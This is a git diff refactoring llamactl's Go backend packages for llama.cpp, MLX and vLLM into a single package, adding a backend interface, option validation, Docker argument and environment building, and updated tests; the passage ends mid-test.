diff --git a/.gitignore b/.gitignore index cf813ce..4075d71 100644 --- a/.gitignore +++ b/.gitignore @@ -36,4 +36,10 @@ dist/ __pycache__/ -site/ \ No newline at end of file +site/ + +# Dev config +llamactl.dev.yaml + +# Debug files +__debug* \ No newline at end of file diff --git a/.vscode/launch.json b/.vscode/launch.json index cb01dbe..b45882e 100644 --- a/.vscode/launch.json +++ b/.vscode/launch.json @@ -12,7 +12,7 @@ "program": "${workspaceFolder}/cmd/server/main.go", "env": { "GO_ENV": "development", - "LLAMACTL_REQUIRE_MANAGEMENT_AUTH": "false" + "LLAMACTL_CONFIG_PATH": "${workspaceFolder}/llamactl.dev.yaml" }, } ] diff --git a/pkg/backends/backend.go b/pkg/backends/backend.go index 802fec2..ae22b1c 100644 --- a/pkg/backends/backend.go +++ b/pkg/backends/backend.go @@ -1,10 +1,251 @@ package backends +import ( + "encoding/json" + "fmt" + "llamactl/pkg/config" + "llamactl/pkg/validation" + "maps" +) + type BackendType string const ( BackendTypeLlamaCpp BackendType = "llama_cpp" BackendTypeMlxLm BackendType = "mlx_lm" BackendTypeVllm BackendType = "vllm" - // BackendTypeMlxVlm BackendType = "mlx_vlm" // Future expansion ) + +type backend interface { + BuildCommandArgs() []string + BuildDockerArgs() []string + GetPort() int + SetPort(int) + GetHost() string + Validate() error +} + +var backendConstructors = map[BackendType]func() backend{ + BackendTypeLlamaCpp: func() backend { return &LlamaServerOptions{} }, + BackendTypeMlxLm: func() backend { return &MlxServerOptions{} }, + BackendTypeVllm: func() backend { return &VllmServerOptions{} }, +} + +type Options struct { + BackendType BackendType `json:"backend_type"` + BackendOptions map[string]any `json:"backend_options,omitempty"` + + // Backend-specific options + LlamaServerOptions *LlamaServerOptions `json:"-"` + MlxServerOptions *MlxServerOptions `json:"-"` + VllmServerOptions *VllmServerOptions `json:"-"` +} + +func (o *Options) UnmarshalJSON(data []byte) error { + type Alias Options + aux := &struct { + *Alias + }{ + Alias: (*Alias)(o), + } + + if err := json.Unmarshal(data, aux); err != nil { + return err + } + + // Create backend from constructor map + if o.BackendOptions != nil { + constructor, exists := backendConstructors[o.BackendType] + if !exists { + return fmt.Errorf("unsupported backend type: %s", o.BackendType) + } + + backend := constructor() + optionsData, err := json.Marshal(o.BackendOptions) + if err != nil { + return fmt.Errorf("failed to marshal backend options: %w", err) + } + + if err := json.Unmarshal(optionsData, backend); err != nil { + return fmt.Errorf("failed to unmarshal backend options: %w", err) + } + + // Store in the appropriate typed field for backward compatibility + o.setBackendOptions(backend) + } + + return nil +} + +func (o *Options) MarshalJSON() ([]byte, error) { + type Alias Options + aux := &struct { + *Alias + }{ + Alias: (*Alias)(o), + } + + // Get backend and marshal it + backend := o.getBackend() + if backend != nil { + optionsData, err := json.Marshal(backend) + if err != nil { + return nil, fmt.Errorf("failed to marshal backend options: %w", err) + } + if err := json.Unmarshal(optionsData, &aux.BackendOptions); err != nil { + return nil, fmt.Errorf("failed to unmarshal backend options to map: %w", err) + } + } + + return json.Marshal(aux) +} + +// setBackendOptions stores the backend in the appropriate typed field +func (o *Options) setBackendOptions(bcknd backend) { + switch v := bcknd.(type) { + case *LlamaServerOptions: + o.LlamaServerOptions = v + case *MlxServerOptions: + 
o.MlxServerOptions = v + case *VllmServerOptions: + o.VllmServerOptions = v + } +} + +func (o *Options) getBackendSettings(backendConfig *config.BackendConfig) *config.BackendSettings { + switch o.BackendType { + case BackendTypeLlamaCpp: + return &backendConfig.LlamaCpp + case BackendTypeMlxLm: + return &backendConfig.MLX + case BackendTypeVllm: + return &backendConfig.VLLM + default: + return nil + } +} + +// getBackend returns the actual backend implementation +func (o *Options) getBackend() backend { + switch o.BackendType { + case BackendTypeLlamaCpp: + return o.LlamaServerOptions + case BackendTypeMlxLm: + return o.MlxServerOptions + case BackendTypeVllm: + return o.VllmServerOptions + default: + return nil + } +} + +func (o *Options) isDockerEnabled(backend *config.BackendSettings) bool { + if backend.Docker != nil && backend.Docker.Enabled && o.BackendType != BackendTypeMlxLm { + return true + } + return false +} + +func (o *Options) IsDockerEnabled(backendConfig *config.BackendConfig) bool { + backendSettings := o.getBackendSettings(backendConfig) + return o.isDockerEnabled(backendSettings) +} + +// GetCommand builds the command to run the backend +func (o *Options) GetCommand(backendConfig *config.BackendConfig) string { + + backendSettings := o.getBackendSettings(backendConfig) + + if o.isDockerEnabled(backendSettings) { + return "docker" + } + + return backendSettings.Command +} + +// buildCommandArgs builds command line arguments for the backend +func (o *Options) BuildCommandArgs(backendConfig *config.BackendConfig) []string { + + var args []string + + backendSettings := o.getBackendSettings(backendConfig) + backend := o.getBackend() + if backend == nil { + return args + } + + if o.isDockerEnabled(backendSettings) { + // For Docker, start with Docker args + args = append(args, backendSettings.Docker.Args...) + args = append(args, backendSettings.Docker.Image) + args = append(args, backend.BuildDockerArgs()...) + + } else { + // For native execution, start with backend args + args = append(args, backendSettings.Args...) + args = append(args, backend.BuildCommandArgs()...) 
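+
+		// Illustrative sketch (hypothetical values, not asserted by this
+		// change): for a llama.cpp instance with backendSettings.Args =
+		// ["--no-webui"] and options {model: "/m.gguf", port: 8080}, this
+		// native branch assembles roughly
+		// ["--no-webui", "--model", "/m.gguf", "--port", "8080"],
+		// while the Docker branch above produces
+		// [<docker args>..., <image>, <backend docker args>...] and
+		// GetCommand (defined above) returns "docker" instead of the
+		// backend command.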
+ } + + return args +} + +// BuildEnvironment builds the environment variables for the backend process +func (o *Options) BuildEnvironment(backendConfig *config.BackendConfig, environment map[string]string) map[string]string { + + backendSettings := o.getBackendSettings(backendConfig) + env := map[string]string{} + + if backendSettings.Environment != nil { + maps.Copy(env, backendSettings.Environment) + } + + if o.isDockerEnabled(backendSettings) { + if backendSettings.Docker.Environment != nil { + maps.Copy(env, backendSettings.Docker.Environment) + } + } + + if environment != nil { + maps.Copy(env, environment) + } + + return env +} + +func (o *Options) GetPort() int { + backend := o.getBackend() + if backend != nil { + return backend.GetPort() + } + return 0 +} + +func (o *Options) SetPort(port int) { + backend := o.getBackend() + if backend != nil { + backend.SetPort(port) + } +} + +func (o *Options) GetHost() string { + backend := o.getBackend() + if backend != nil { + return backend.GetHost() + } + return "localhost" +} + +func (o *Options) GetResponseHeaders(backendConfig *config.BackendConfig) map[string]string { + backendSettings := o.getBackendSettings(backendConfig) + return backendSettings.ResponseHeaders +} + +// ValidateInstanceOptions performs validation based on backend type +func (o *Options) ValidateInstanceOptions() error { + backend := o.getBackend() + if backend == nil { + return validation.ValidationError(fmt.Errorf("backend options cannot be nil for backend type %s", o.BackendType)) + } + + return backend.Validate() +} diff --git a/pkg/backends/llamacpp/llama.go b/pkg/backends/llama.go similarity index 93% rename from pkg/backends/llamacpp/llama.go rename to pkg/backends/llama.go index bca29e8..dc07457 100644 --- a/pkg/backends/llamacpp/llama.go +++ b/pkg/backends/llama.go @@ -1,15 +1,16 @@ -package llamacpp +package backends import ( "encoding/json" - "llamactl/pkg/backends" + "fmt" + "llamactl/pkg/validation" "reflect" "strconv" ) -// multiValuedFlags defines flags that should be repeated for each value rather than comma-separated +// llamaMultiValuedFlags defines flags that should be repeated for each value rather than comma-separated // Used for both parsing (with underscores) and building (with dashes) -var multiValuedFlags = map[string]bool{ +var llamaMultiValuedFlags = map[string]bool{ // Parsing keys (with underscores) "override_tensor": true, "override_kv": true, @@ -335,11 +336,41 @@ func (o *LlamaServerOptions) UnmarshalJSON(data []byte) error { return nil } +func (o *LlamaServerOptions) GetPort() int { + return o.Port +} + +func (o *LlamaServerOptions) SetPort(port int) { + o.Port = port +} + +func (o *LlamaServerOptions) GetHost() string { + return o.Host +} + +func (o *LlamaServerOptions) Validate() error { + if o == nil { + return validation.ValidationError(fmt.Errorf("llama server options cannot be nil for llama.cpp backend")) + } + + // Use reflection to check all string fields for injection patterns + if err := validation.ValidateStructStrings(o, ""); err != nil { + return err + } + + // Basic network validation for port + if o.Port < 0 || o.Port > 65535 { + return validation.ValidationError(fmt.Errorf("invalid port range: %d", o.Port)) + } + + return nil +} + // BuildCommandArgs converts InstanceOptions to command line arguments func (o *LlamaServerOptions) BuildCommandArgs() []string { // Llama uses multiple flags for arrays by default (not comma-separated) - // Use package-level multiValuedFlags variable - return backends.BuildCommandArgs(o, 
multiValuedFlags) + // Use package-level llamaMultiValuedFlags variable + return BuildCommandArgs(o, llamaMultiValuedFlags) } func (o *LlamaServerOptions) BuildDockerArgs() []string { @@ -356,10 +387,10 @@ func (o *LlamaServerOptions) BuildDockerArgs() []string { func ParseLlamaCommand(command string) (*LlamaServerOptions, error) { executableNames := []string{"llama-server"} var subcommandNames []string // Llama has no subcommands - // Use package-level multiValuedFlags variable + // Use package-level llamaMultiValuedFlags variable var llamaOptions LlamaServerOptions - if err := backends.ParseCommand(command, executableNames, subcommandNames, multiValuedFlags, &llamaOptions); err != nil { + if err := ParseCommand(command, executableNames, subcommandNames, llamaMultiValuedFlags, &llamaOptions); err != nil { return nil, err } diff --git a/pkg/backends/llamacpp/llama_test.go b/pkg/backends/llama_test.go similarity index 61% rename from pkg/backends/llamacpp/llama_test.go rename to pkg/backends/llama_test.go index c779320..c05a3a5 100644 --- a/pkg/backends/llamacpp/llama_test.go +++ b/pkg/backends/llama_test.go @@ -1,71 +1,38 @@ -package llamacpp_test +package backends_test import ( "encoding/json" "fmt" - "llamactl/pkg/backends/llamacpp" + "llamactl/pkg/backends" + "llamactl/pkg/testutil" "reflect" - "slices" "testing" ) -func TestBuildCommandArgs_BasicFields(t *testing.T) { - options := llamacpp.LlamaServerOptions{ - Model: "/path/to/model.gguf", - Port: 8080, - Host: "localhost", - Verbose: true, - CtxSize: 4096, - GPULayers: 32, - } - - args := options.BuildCommandArgs() - - // Check individual arguments - expectedPairs := map[string]string{ - "--model": "/path/to/model.gguf", - "--port": "8080", - "--host": "localhost", - "--ctx-size": "4096", - "--gpu-layers": "32", - } - - for flag, expectedValue := range expectedPairs { - if !containsFlagWithValue(args, flag, expectedValue) { - t.Errorf("Expected %s %s, not found in %v", flag, expectedValue, args) - } - } - - // Check standalone boolean flag - if !contains(args, "--verbose") { - t.Errorf("Expected --verbose flag not found in %v", args) - } -} - -func TestBuildCommandArgs_BooleanFields(t *testing.T) { +func TestLlamaCppBuildCommandArgs_BooleanFields(t *testing.T) { tests := []struct { name string - options llamacpp.LlamaServerOptions + options backends.LlamaServerOptions expected []string excluded []string }{ { name: "verbose true", - options: llamacpp.LlamaServerOptions{ + options: backends.LlamaServerOptions{ Verbose: true, }, expected: []string{"--verbose"}, }, { name: "verbose false", - options: llamacpp.LlamaServerOptions{ + options: backends.LlamaServerOptions{ Verbose: false, }, excluded: []string{"--verbose"}, }, { name: "multiple booleans", - options: llamacpp.LlamaServerOptions{ + options: backends.LlamaServerOptions{ Verbose: true, FlashAttn: true, Mlock: false, @@ -81,13 +48,13 @@ func TestBuildCommandArgs_BooleanFields(t *testing.T) { args := tt.options.BuildCommandArgs() for _, expectedArg := range tt.expected { - if !contains(args, expectedArg) { + if !testutil.Contains(args, expectedArg) { t.Errorf("Expected argument %q not found in %v", expectedArg, args) } } for _, excludedArg := range tt.excluded { - if contains(args, excludedArg) { + if testutil.Contains(args, excludedArg) { t.Errorf("Excluded argument %q found in %v", excludedArg, args) } } @@ -95,38 +62,8 @@ func TestBuildCommandArgs_BooleanFields(t *testing.T) { } } -func TestBuildCommandArgs_NumericFields(t *testing.T) { - options := llamacpp.LlamaServerOptions{ 
- Port: 8080, - Threads: 4, - CtxSize: 2048, - GPULayers: 16, - Temperature: 0.7, - TopK: 40, - TopP: 0.9, - } - - args := options.BuildCommandArgs() - - expectedPairs := map[string]string{ - "--port": "8080", - "--threads": "4", - "--ctx-size": "2048", - "--gpu-layers": "16", - "--temp": "0.7", - "--top-k": "40", - "--top-p": "0.9", - } - - for flag, expectedValue := range expectedPairs { - if !containsFlagWithValue(args, flag, expectedValue) { - t.Errorf("Expected %s %s, not found in %v", flag, expectedValue, args) - } - } -} - -func TestBuildCommandArgs_ZeroValues(t *testing.T) { - options := llamacpp.LlamaServerOptions{ +func TestLlamaCppBuildCommandArgs_ZeroValues(t *testing.T) { + options := backends.LlamaServerOptions{ Port: 0, // Should be excluded Threads: 0, // Should be excluded Temperature: 0, // Should be excluded @@ -146,14 +83,14 @@ func TestBuildCommandArgs_ZeroValues(t *testing.T) { } for _, excludedArg := range excludedArgs { - if contains(args, excludedArg) { + if testutil.Contains(args, excludedArg) { t.Errorf("Zero value argument %q should not be present in %v", excludedArg, args) } } } -func TestBuildCommandArgs_ArrayFields(t *testing.T) { - options := llamacpp.LlamaServerOptions{ +func TestLlamaCppBuildCommandArgs_ArrayFields(t *testing.T) { + options := backends.LlamaServerOptions{ Lora: []string{"adapter1.bin", "adapter2.bin"}, OverrideTensor: []string{"tensor1", "tensor2", "tensor3"}, DrySequenceBreaker: []string{".", "!", "?"}, @@ -170,15 +107,15 @@ func TestBuildCommandArgs_ArrayFields(t *testing.T) { for flag, values := range expectedOccurrences { for _, value := range values { - if !containsFlagWithValue(args, flag, value) { + if !testutil.ContainsFlagWithValue(args, flag, value) { t.Errorf("Expected %s %s, not found in %v", flag, value, args) } } } } -func TestBuildCommandArgs_EmptyArrays(t *testing.T) { - options := llamacpp.LlamaServerOptions{ +func TestLlamaCppBuildCommandArgs_EmptyArrays(t *testing.T) { + options := backends.LlamaServerOptions{ Lora: []string{}, // Empty array should not generate args OverrideTensor: []string{}, // Empty array should not generate args } @@ -187,43 +124,13 @@ func TestBuildCommandArgs_EmptyArrays(t *testing.T) { excludedArgs := []string{"--lora", "--override-tensor"} for _, excludedArg := range excludedArgs { - if contains(args, excludedArg) { + if testutil.Contains(args, excludedArg) { t.Errorf("Empty array should not generate argument %q in %v", excludedArg, args) } } } -func TestBuildCommandArgs_FieldNameConversion(t *testing.T) { - // Test snake_case to kebab-case conversion - options := llamacpp.LlamaServerOptions{ - CtxSize: 4096, - GPULayers: 32, - ThreadsBatch: 2, - FlashAttn: true, - TopK: 40, - TopP: 0.9, - } - - args := options.BuildCommandArgs() - - // Check that field names are properly converted - expectedFlags := []string{ - "--ctx-size", // ctx_size -> ctx-size - "--gpu-layers", // gpu_layers -> gpu-layers - "--threads-batch", // threads_batch -> threads-batch - "--flash-attn", // flash_attn -> flash-attn - "--top-k", // top_k -> top-k - "--top-p", // top_p -> top-p - } - - for _, flag := range expectedFlags { - if !contains(args, flag) { - t.Errorf("Expected flag %q not found in %v", flag, args) - } - } -} - -func TestUnmarshalJSON_StandardFields(t *testing.T) { +func TestLlamaCppUnmarshalJSON_StandardFields(t *testing.T) { jsonData := `{ "model": "/path/to/model.gguf", "port": 8080, @@ -234,7 +141,7 @@ func TestUnmarshalJSON_StandardFields(t *testing.T) { "temp": 0.7 }` - var options 
llamacpp.LlamaServerOptions
+	var options backends.LlamaServerOptions
 	err := json.Unmarshal([]byte(jsonData), &options)
 	if err != nil {
 		t.Fatalf("Unmarshal failed: %v", err)
@@ -263,16 +170,16 @@ func TestUnmarshalJSON_StandardFields(t *testing.T) {
 	}
 }
 
-func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
+func TestLlamaCppUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
 	tests := []struct {
 		name     string
 		jsonData string
-		checkFn  func(llamacpp.LlamaServerOptions) error
+		checkFn  func(backends.LlamaServerOptions) error
 	}{
 		{
 			name:     "threads alternatives",
 			jsonData: `{"t": 4, "tb": 2}`,
-			checkFn: func(opts llamacpp.LlamaServerOptions) error {
+			checkFn: func(opts backends.LlamaServerOptions) error {
 				if opts.Threads != 4 {
 					return fmt.Errorf("expected threads 4, got %d", opts.Threads)
 				}
@@ -285,7 +192,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
 		{
 			name:     "context size alternatives",
 			jsonData: `{"c": 2048}`,
-			checkFn: func(opts llamacpp.LlamaServerOptions) error {
+			checkFn: func(opts backends.LlamaServerOptions) error {
 				if opts.CtxSize != 2048 {
 					return fmt.Errorf("expected ctx_size 2048, got %d", opts.CtxSize)
 				}
@@ -295,7 +202,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
 		{
 			name:     "gpu layers alternatives",
 			jsonData: `{"ngl": 16}`,
-			checkFn: func(opts llamacpp.LlamaServerOptions) error {
+			checkFn: func(opts backends.LlamaServerOptions) error {
 				if opts.GPULayers != 16 {
 					return fmt.Errorf("expected gpu_layers 16, got %d", opts.GPULayers)
 				}
@@ -305,7 +212,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
 		{
 			name:     "model alternatives",
 			jsonData: `{"m": "/path/model.gguf"}`,
-			checkFn: func(opts llamacpp.LlamaServerOptions) error {
+			checkFn: func(opts backends.LlamaServerOptions) error {
 				if opts.Model != "/path/model.gguf" {
 					return fmt.Errorf("expected model '/path/model.gguf', got %q", opts.Model)
 				}
@@ -315,7 +222,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
 		{
 			name:     "temperature alternatives",
 			jsonData: `{"temp": 0.8}`,
-			checkFn: func(opts llamacpp.LlamaServerOptions) error {
+			checkFn: func(opts backends.LlamaServerOptions) error {
 				if opts.Temperature != 0.8 {
 					return fmt.Errorf("expected temperature 0.8, got %f", opts.Temperature)
 				}
@@ -326,7 +233,7 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
 
 	for _, tt := range tests {
 		t.Run(tt.name, func(t *testing.T) {
-			var options llamacpp.LlamaServerOptions
+			var options backends.LlamaServerOptions
 			err := json.Unmarshal([]byte(tt.jsonData), &options)
 			if err != nil {
 				t.Fatalf("Unmarshal failed: %v", err)
@@ -339,24 +246,24 @@ func TestUnmarshalJSON_AlternativeFieldNames(t *testing.T) {
 	}
 }
 
-func TestUnmarshalJSON_InvalidJSON(t *testing.T) {
+func TestLlamaCppUnmarshalJSON_InvalidJSON(t *testing.T) {
 	invalidJSON := `{"port": "not-a-number", "invalid": syntax}`
 
-	var options llamacpp.LlamaServerOptions
+	var options backends.LlamaServerOptions
 	err := json.Unmarshal([]byte(invalidJSON), &options)
 	if err == nil {
 		t.Error("Expected error for invalid JSON")
 	}
 }
 
-func TestUnmarshalJSON_ArrayFields(t *testing.T) {
+func TestLlamaCppUnmarshalJSON_ArrayFields(t *testing.T) {
 	jsonData := `{
 		"lora": ["adapter1.bin", "adapter2.bin"],
 		"override_tensor": ["tensor1", "tensor2"],
 		"dry_sequence_breaker": [".", "!", "?"]
 	}`
 
-	var options llamacpp.LlamaServerOptions
+	var options backends.LlamaServerOptions
 	err := json.Unmarshal([]byte(jsonData), &options)
 	if err != nil {
 		t.Fatalf("Unmarshal failed: %v", err)
@@ -383,26 +290,81 @@ func TestParseLlamaCommand(t *testing.T) 
{ name string command string expectErr bool + validate func(*testing.T, *backends.LlamaServerOptions) }{ { name: "basic command", command: "llama-server --model /path/to/model.gguf --gpu-layers 32", expectErr: false, + validate: func(t *testing.T, opts *backends.LlamaServerOptions) { + if opts.Model != "/path/to/model.gguf" { + t.Errorf("expected model '/path/to/model.gguf', got '%s'", opts.Model) + } + if opts.GPULayers != 32 { + t.Errorf("expected gpu_layers 32, got %d", opts.GPULayers) + } + }, }, { name: "args only", command: "--model /path/to/model.gguf --ctx-size 4096", expectErr: false, + validate: func(t *testing.T, opts *backends.LlamaServerOptions) { + if opts.Model != "/path/to/model.gguf" { + t.Errorf("expected model '/path/to/model.gguf', got '%s'", opts.Model) + } + if opts.CtxSize != 4096 { + t.Errorf("expected ctx_size 4096, got %d", opts.CtxSize) + } + }, }, { name: "mixed flag formats", command: "llama-server --model=/path/model.gguf --gpu-layers 16 --verbose", expectErr: false, + validate: func(t *testing.T, opts *backends.LlamaServerOptions) { + if opts.Model != "/path/model.gguf" { + t.Errorf("expected model '/path/model.gguf', got '%s'", opts.Model) + } + if opts.GPULayers != 16 { + t.Errorf("expected gpu_layers 16, got %d", opts.GPULayers) + } + if !opts.Verbose { + t.Errorf("expected verbose to be true") + } + }, }, { name: "quoted strings", command: `llama-server --model test.gguf --api-key "sk-1234567890abcdef"`, expectErr: false, + validate: func(t *testing.T, opts *backends.LlamaServerOptions) { + if opts.APIKey != "sk-1234567890abcdef" { + t.Errorf("expected api_key 'sk-1234567890abcdef', got '%s'", opts.APIKey) + } + }, + }, + { + name: "multiple value types", + command: "llama-server --model /test/model.gguf --gpu-layers 32 --temp 0.7 --verbose --no-mmap", + expectErr: false, + validate: func(t *testing.T, opts *backends.LlamaServerOptions) { + if opts.Model != "/test/model.gguf" { + t.Errorf("expected model '/test/model.gguf', got '%s'", opts.Model) + } + if opts.GPULayers != 32 { + t.Errorf("expected gpu_layers 32, got %d", opts.GPULayers) + } + if opts.Temperature != 0.7 { + t.Errorf("expected temperature 0.7, got %f", opts.Temperature) + } + if !opts.Verbose { + t.Errorf("expected verbose to be true") + } + if !opts.NoMmap { + t.Errorf("expected no_mmap to be true") + } + }, }, { name: "empty command", @@ -423,7 +385,7 @@ func TestParseLlamaCommand(t *testing.T) { for _, tt := range tests { t.Run(tt.name, func(t *testing.T) { - result, err := llamacpp.ParseLlamaCommand(tt.command) + result, err := backends.ParseLlamaCommand(tt.command) if tt.expectErr { if err == nil { @@ -439,43 +401,19 @@ func TestParseLlamaCommand(t *testing.T) { if result == nil { t.Errorf("expected result but got nil") + return + } + + if tt.validate != nil { + tt.validate(t, result) } }) } } -func TestParseLlamaCommandValues(t *testing.T) { - command := "llama-server --model /test/model.gguf --gpu-layers 32 --temp 0.7 --verbose --no-mmap" - result, err := llamacpp.ParseLlamaCommand(command) - - if err != nil { - t.Fatalf("unexpected error: %v", err) - } - - if result.Model != "/test/model.gguf" { - t.Errorf("expected model '/test/model.gguf', got '%s'", result.Model) - } - - if result.GPULayers != 32 { - t.Errorf("expected gpu_layers 32, got %d", result.GPULayers) - } - - if result.Temperature != 0.7 { - t.Errorf("expected temperature 0.7, got %f", result.Temperature) - } - - if !result.Verbose { - t.Errorf("expected verbose to be true") - } - - if !result.NoMmap { - 
t.Errorf("expected no_mmap to be true") - } -} - func TestParseLlamaCommandArrays(t *testing.T) { command := "llama-server --model test.gguf --lora adapter1.bin --lora=adapter2.bin" - result, err := llamacpp.ParseLlamaCommand(command) + result, err := backends.ParseLlamaCommand(command) if err != nil { t.Fatalf("unexpected error: %v", err) @@ -491,21 +429,4 @@ func TestParseLlamaCommandArrays(t *testing.T) { t.Errorf("expected lora[%d]=%s got %s", i, v, result.Lora[i]) } } -} - -// Helper functions -func contains(slice []string, item string) bool { - return slices.Contains(slice, item) -} - -func containsFlagWithValue(args []string, flag, value string) bool { - for i, arg := range args { - if arg == flag { - // Check if there's a next argument and it matches the expected value - if i+1 < len(args) && args[i+1] == value { - return true - } - } - } - return false -} +} \ No newline at end of file diff --git a/pkg/backends/mlx/mlx.go b/pkg/backends/mlx.go similarity index 67% rename from pkg/backends/mlx/mlx.go rename to pkg/backends/mlx.go index 3b83681..d0ec602 100644 --- a/pkg/backends/mlx/mlx.go +++ b/pkg/backends/mlx.go @@ -1,7 +1,8 @@ -package mlx +package backends import ( - "llamactl/pkg/backends" + "fmt" + "llamactl/pkg/validation" ) type MlxServerOptions struct { @@ -30,10 +31,43 @@ type MlxServerOptions struct { MaxTokens int `json:"max_tokens,omitempty"` } +func (o *MlxServerOptions) GetPort() int { + return o.Port +} + +func (o *MlxServerOptions) SetPort(port int) { + o.Port = port +} + +func (o *MlxServerOptions) GetHost() string { + return o.Host +} + +func (o *MlxServerOptions) Validate() error { + if o == nil { + return validation.ValidationError(fmt.Errorf("MLX server options cannot be nil for MLX backend")) + } + + if err := validation.ValidateStructStrings(o, ""); err != nil { + return err + } + + // Basic network validation for port + if o.Port < 0 || o.Port > 65535 { + return validation.ValidationError(fmt.Errorf("invalid port range: %d", o.Port)) + } + + return nil +} + // BuildCommandArgs converts to command line arguments func (o *MlxServerOptions) BuildCommandArgs() []string { multipleFlags := map[string]bool{} // MLX doesn't currently have []string fields - return backends.BuildCommandArgs(o, multipleFlags) + return BuildCommandArgs(o, multipleFlags) +} + +func (o *MlxServerOptions) BuildDockerArgs() []string { + return []string{} } // ParseMlxCommand parses a mlx_lm.server command string into MlxServerOptions @@ -48,7 +82,7 @@ func ParseMlxCommand(command string) (*MlxServerOptions, error) { multiValuedFlags := map[string]bool{} // MLX has no multi-valued flags var mlxOptions MlxServerOptions - if err := backends.ParseCommand(command, executableNames, subcommandNames, multiValuedFlags, &mlxOptions); err != nil { + if err := ParseCommand(command, executableNames, subcommandNames, multiValuedFlags, &mlxOptions); err != nil { return nil, err } diff --git a/pkg/backends/mlx/mlx_test.go b/pkg/backends/mlx/mlx_test.go deleted file mode 100644 index 8baeb5c..0000000 --- a/pkg/backends/mlx/mlx_test.go +++ /dev/null @@ -1,157 +0,0 @@ -package mlx_test - -import ( - "llamactl/pkg/backends/mlx" - "testing" -) - -func TestParseMlxCommand(t *testing.T) { - tests := []struct { - name string - command string - expectErr bool - }{ - { - name: "basic command", - command: "mlx_lm.server --model /path/to/model --host 0.0.0.0", - expectErr: false, - }, - { - name: "args only", - command: "--model /path/to/model --port 8080", - expectErr: false, - }, - { - name: "mixed flag formats", - 
command: "mlx_lm.server --model=/path/model --temp=0.7 --trust-remote-code", - expectErr: false, - }, - { - name: "quoted strings", - command: `mlx_lm.server --model test.mlx --chat-template "User: {user}\nAssistant: "`, - expectErr: false, - }, - { - name: "empty command", - command: "", - expectErr: true, - }, - { - name: "unterminated quote", - command: `mlx_lm.server --model test.mlx --chat-template "unterminated`, - expectErr: true, - }, - { - name: "malformed flag", - command: "mlx_lm.server ---model test.mlx", - expectErr: true, - }, - } - - for _, tt := range tests { - t.Run(tt.name, func(t *testing.T) { - result, err := mlx.ParseMlxCommand(tt.command) - - if tt.expectErr { - if err == nil { - t.Errorf("expected error but got none") - } - return - } - - if err != nil { - t.Errorf("unexpected error: %v", err) - return - } - - if result == nil { - t.Errorf("expected result but got nil") - } - }) - } -} - -func TestParseMlxCommandValues(t *testing.T) { - command := "mlx_lm.server --model /test/model.mlx --port 8080 --temp 0.7 --trust-remote-code --log-level DEBUG" - result, err := mlx.ParseMlxCommand(command) - - if err != nil { - t.Fatalf("unexpected error: %v", err) - } - - if result.Model != "/test/model.mlx" { - t.Errorf("expected model '/test/model.mlx', got '%s'", result.Model) - } - - if result.Port != 8080 { - t.Errorf("expected port 8080, got %d", result.Port) - } - - if result.Temp != 0.7 { - t.Errorf("expected temp 0.7, got %f", result.Temp) - } - - if !result.TrustRemoteCode { - t.Errorf("expected trust_remote_code to be true") - } - - if result.LogLevel != "DEBUG" { - t.Errorf("expected log_level 'DEBUG', got '%s'", result.LogLevel) - } -} - -func TestBuildCommandArgs(t *testing.T) { - options := &mlx.MlxServerOptions{ - Model: "/test/model.mlx", - Host: "127.0.0.1", - Port: 8080, - Temp: 0.7, - TopP: 0.9, - TopK: 40, - MaxTokens: 2048, - TrustRemoteCode: true, - LogLevel: "DEBUG", - ChatTemplate: "custom template", - } - - args := options.BuildCommandArgs() - - // Check that all expected flags are present - expectedFlags := map[string]string{ - "--model": "/test/model.mlx", - "--host": "127.0.0.1", - "--port": "8080", - "--log-level": "DEBUG", - "--chat-template": "custom template", - "--temp": "0.7", - "--top-p": "0.9", - "--top-k": "40", - "--max-tokens": "2048", - } - - for i := 0; i < len(args); i++ { - if args[i] == "--trust-remote-code" { - continue // Boolean flag with no value - } - if args[i] == "--use-default-chat-template" { - continue // Boolean flag with no value - } - - if expectedValue, exists := expectedFlags[args[i]]; exists && i+1 < len(args) { - if args[i+1] != expectedValue { - t.Errorf("expected %s to have value %s, got %s", args[i], expectedValue, args[i+1]) - } - } - } - - // Check boolean flags - foundTrustRemoteCode := false - for _, arg := range args { - if arg == "--trust-remote-code" { - foundTrustRemoteCode = true - } - } - if !foundTrustRemoteCode { - t.Errorf("expected --trust-remote-code flag to be present") - } -} diff --git a/pkg/backends/mlx_test.go b/pkg/backends/mlx_test.go new file mode 100644 index 0000000..0194551 --- /dev/null +++ b/pkg/backends/mlx_test.go @@ -0,0 +1,202 @@ +package backends_test + +import ( + "llamactl/pkg/backends" + "llamactl/pkg/testutil" + "testing" +) + +func TestParseMlxCommand(t *testing.T) { + tests := []struct { + name string + command string + expectErr bool + validate func(*testing.T, *backends.MlxServerOptions) + }{ + { + name: "basic command", + command: "mlx_lm.server --model /path/to/model --host 
0.0.0.0", + expectErr: false, + validate: func(t *testing.T, opts *backends.MlxServerOptions) { + if opts.Model != "/path/to/model" { + t.Errorf("expected model '/path/to/model', got '%s'", opts.Model) + } + if opts.Host != "0.0.0.0" { + t.Errorf("expected host '0.0.0.0', got '%s'", opts.Host) + } + }, + }, + { + name: "args only", + command: "--model /path/to/model --port 8080", + expectErr: false, + validate: func(t *testing.T, opts *backends.MlxServerOptions) { + if opts.Model != "/path/to/model" { + t.Errorf("expected model '/path/to/model', got '%s'", opts.Model) + } + if opts.Port != 8080 { + t.Errorf("expected port 8080, got %d", opts.Port) + } + }, + }, + { + name: "mixed flag formats", + command: "mlx_lm.server --model=/path/model --temp=0.7 --trust-remote-code", + expectErr: false, + validate: func(t *testing.T, opts *backends.MlxServerOptions) { + if opts.Model != "/path/model" { + t.Errorf("expected model '/path/model', got '%s'", opts.Model) + } + if opts.Temp != 0.7 { + t.Errorf("expected temp 0.7, got %f", opts.Temp) + } + if !opts.TrustRemoteCode { + t.Errorf("expected trust_remote_code to be true") + } + }, + }, + { + name: "multiple value types", + command: "mlx_lm.server --model /test/model.mlx --port 8080 --temp 0.7 --trust-remote-code --log-level DEBUG", + expectErr: false, + validate: func(t *testing.T, opts *backends.MlxServerOptions) { + if opts.Model != "/test/model.mlx" { + t.Errorf("expected model '/test/model.mlx', got '%s'", opts.Model) + } + if 